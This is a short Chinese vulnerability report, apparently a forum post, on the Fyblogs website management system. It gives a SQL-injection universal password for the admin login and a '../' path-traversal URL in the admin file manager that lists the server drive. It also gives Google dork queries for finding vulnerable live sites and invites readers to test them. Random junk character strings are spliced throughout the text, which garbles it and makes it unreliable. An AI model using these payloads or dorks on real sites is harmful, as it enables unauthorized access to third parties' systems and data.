漏洞类型: 未授权访问/权限绕过
; [$ w% F' N% ]1 P3 |! F" w
3 G! \1 b E7 c6 k' F简要描述:
1 G5 @! H7 Z; q# P/ }& A2 w8 a/ s
7 ^- d- ~& m! b4 m5 vFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 ~9 U" b, E3 F' d) ?4 o0 l ~6 y4 b/ `% N4 n6 k/ r+ A8 v: K
详细说明:
/ b6 c& a- l: ?; i# R* V2 V4 b% Y' {' R! v% @8 S
后台万能密码 'or'='or'
/ h [' x& o k$ N# k后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
/ A1 Z; {; }1 v0 Z+ Jadmin/uploadfile.asp?currentFolder=/upfiles/../+ K( R' i+ s) i0 l
6 a* O, I8 v9 s/ Y, G) B
漏洞证明:# X7 y- q- v- Z0 Z% V
1 L2 _0 i- x7 [2 _" o谷歌:inurl:type.asp?id=1 新闻中心
) L# ]5 Y, `! C: i或者 :inurl:download_ok.asp?
) }/ q- h; n) T6 F; a& a* \8 f* d l# D. w
可以测试/ O. k* H- Z& H2 v0 N
; U: E& c) W7 F* v: R- ^6 X! Q
2 _% i2 B: r4 t/ s9 c% ~ |